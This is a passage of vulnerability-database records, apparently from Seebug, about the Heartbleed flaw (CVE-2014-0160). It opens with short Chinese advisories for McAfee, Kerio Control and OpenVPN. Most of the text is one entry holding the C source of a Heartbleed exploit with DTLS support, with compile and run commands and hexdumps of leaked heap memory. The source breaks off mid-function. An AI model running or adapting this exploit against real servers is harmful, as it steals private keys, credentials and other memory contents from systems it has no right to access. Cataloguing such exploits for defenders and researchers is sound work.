Agent\u662f\u4e00\u6b3eMcAfee\u4ea7\u54c1\u4e2d\u6240\u4f7f\u7528\u7684\u4e00\u4e2a\u7f51\u7edc\u670d\u52a1\u3002 \r\n\r\nMcAfee Endpoint Intelligence 
Agent\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201c\u5fc3\u8df3\u201d\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u8fde\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Endpoint Intelligence Agent 1.x (Formerly Network Integrity Agent)\nMcAfee Endpoint Intelligence Agent 2.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.mcafee.com", "published": "2014-04-21T00:00:00", "title": "McAfee Endpoint Intelligence Agent OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62238", "id": "SSV:62238", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:38", "description": "CVE ID:CVE-2014-0160\r\n\r\nKerio Control\u662f\u4e00\u6b3e\u9632\u706b\u5899\u7cfb\u7edf\u3002\r\n\r\nKerio Control\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201c\u5fc3\u8df3\u201d\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u8fde\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nKerio Control 8.x\nKerio Control 8.2.2 patch2\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.kerio.com", 
"published": "2014-04-16T00:00:00", "title": "Kerio Control OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62189", "id": "SSV:62189", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:49", "description": "CVE ID:CVE-2014-0160\r\n\r\nOpenVPN\u662f\u4e00\u6b3e\u5f00\u6e90VPN\u5b9e\u73b0\u3002\r\n\r\nOpenVPN\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nOpenVPN 2.x\nOpenVPN 2.3.3-I002\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://openvpn.net/", "published": "2014-04-21T00:00:00", "title": "OpenVPN OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62239", "id": "SSV:62239", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:10:46", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": 
"https://www.seebug.org/vuldb/ssvid-86255", "id": "SSV:86255", "sourceData": "\n /* \r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted \r\n* and wrote to a file to annoy IDS/forensics. The exploit can \r\n* set heartbeat payload length arbitrarily or use two preset \r\n* values for NULL and MAX length. The vulnerability occurs due \r\n* to bounds checking not being performed on a heap value which \r\n* is user supplied and returned to the user as part of DTLS/TLS \r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \r\n* 1.0.1f are known affected. You must run this against a target \r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65532 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size. 
\r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" \r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n\r\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\r\n*\r\n* use -u switch, tested against 
s_server/s_client version 1.0.1d\r\n* \r\n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\r\n* ...\r\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n* \r\n* \r\n* # hexdump -C eshta \r\n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........|\r\n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5|\r\n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.|\r\n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....|\r\n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................|\r\n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |.....@..........|\r\n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............|\r\n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0|\r\n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U|\r\n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168|\r\n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......|\r\n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I|\r\n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....|\r\n* 0000054b\r\n* \r\n* \r\n* # openssl s_client -connect localhost:990 -dtls1\r\n* ...\r\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ 
=============================================================\r\n* [ SSL connection using AES256-SHA\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n* \r\n* \r\n* # hexdump -C eshta \r\n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|\r\n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...".(n|\r\n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|\r\n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|\r\n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.|\r\n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|\r\n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|\r\n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|\r\n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|\r\n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|\r\n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|\r\n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |.........@b...E_|\r\n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|\r\n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..|\r\n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...|\r\n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|\r\n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|\r\n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |\r\n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0.."0...*.H..|\r\n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 
|...........0....|\r\n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|\r\n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|\r\n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|\r\n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....|\r\n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|\r\n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|\r\n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|\r\n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|\r\n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|\r\n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|\r\n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|\r\n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...|\r\n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|\r\n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|\r\n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|\r\n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...|\r\n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..|\r\n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.|\r\n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...|\r\n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w|\r\n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..|\r\n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|\r\n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|\r\n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |.@X-.2....d.....|\r\n* 000002c0 18 d3 5d c6 a0 bb 84 
4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|\r\n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|\r\n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|\r\n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |."..m!./.....\\.D|\r\n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |...AL..@.T.....j|\r\n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|\r\n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e...."|\r\n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |..b...d..p...@.I|\r\n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|\r\n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|\r\n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|\r\n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|\r\n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q."gf."...1...;|\r\n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|\r\n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|\r\n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|\r\n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* *\r\n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..|\r\n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.|\r\n* 0000054b\r\n* \r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include 
<openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n\r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n\t\t(((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n\r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n\r\ntypedef struct {\r\n\tint socket;\r\n\tSSL *sslHandle;\r\n\tSSL_CTX *sslContext;\r\n} connection;\r\n\r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n\r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n\r\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\r\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\r\n\r\nint tcp_connect(char* server,int port){\r\n\tint sd,ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n\t\tprintf("[!] 
cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n\tprintf("[ connecting to %s %d/tcp\\n",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n\tif(ret==0){\r\n\t\tprintf("[ connected to %s %d/tcp\\n",server,port);\r\n\t}\r\n\telse{\r\n\t\tprintf("[!] FATAL: could not connect to %s %d/tcp\\n",server,port);\r\n\t\texit(0);\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nint tcp_bind(char* server, int port){\r\n\tint sd, ret, val=1;\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *host;\r\n\thost = gethostbyname(server);\r\n\tsd=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sd==-1){\r\n \t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tmemset(&sin,0,sizeof(sin));\r\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=htons(port);\r\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n\tif(ret==-1){\r\n\t\tprintf("[!] cannot bind socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tlisten(sd,5);\r\n\treturn(sd);\r\n}\r\n\r\nconnection* dtls_server(int sd, char* server,int port){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n\tint ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n\tunsigned long addr;\r\n if ((host = gethostbyname(server)) == NULL) {\r\n\t\tperror("gethostbyname");\r\n\t\texit(1);\r\n\t}\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n\t\tprintf("[!] 
cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n\tif (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n\t\tperror("bind()");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tBIO *bio;\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\r\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] 
FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n\r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_accept_state (c->sslHandle);\r\n\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n//\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n//\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n\r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n\tc = malloc(sizeof(connection));\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n 
}\r\n\treturn c;\r\n}\r\n\r\nconnection* dtls_client(int sd, char* server,int port){\r\n\tint ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n connection *c;\r\n\tmemset((char *)&sa,0,sizeof(sa));\r\n\tc = malloc(sizeof(connection));\r\n if ((host = gethostbyname(server)) == NULL) {\r\n\t\tperror("gethostbyname");\r\n\t\texit(1);\r\n\t}\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n\tif (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n\t\tperror("connect()");\r\n\t\texit(0);\r\n\t}\r\n\r\n\tBIO *bio;\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\r\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslHandle = SSL_new(c->sslContext);\r\n\tSSL_set_tlsext_host_name(c->sslHandle,server);\r\n\tbio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n\r\n\tBIO_ctrl_set_connected(bio, 1, &sa);\r\n\tSSL_set_bio(c->sslHandle, bio, bio);\r\n\tSSL_set_connect_state (c->sslHandle);\r\n//printf("eshta\\n");\r\n if(SSL_connect(c->sslHandle)!=1) \r\n ERR_print_errors_fp(stderr);\r\n\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway), %d \\n",c->sslHandle->tlsext_heartbeat);\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* 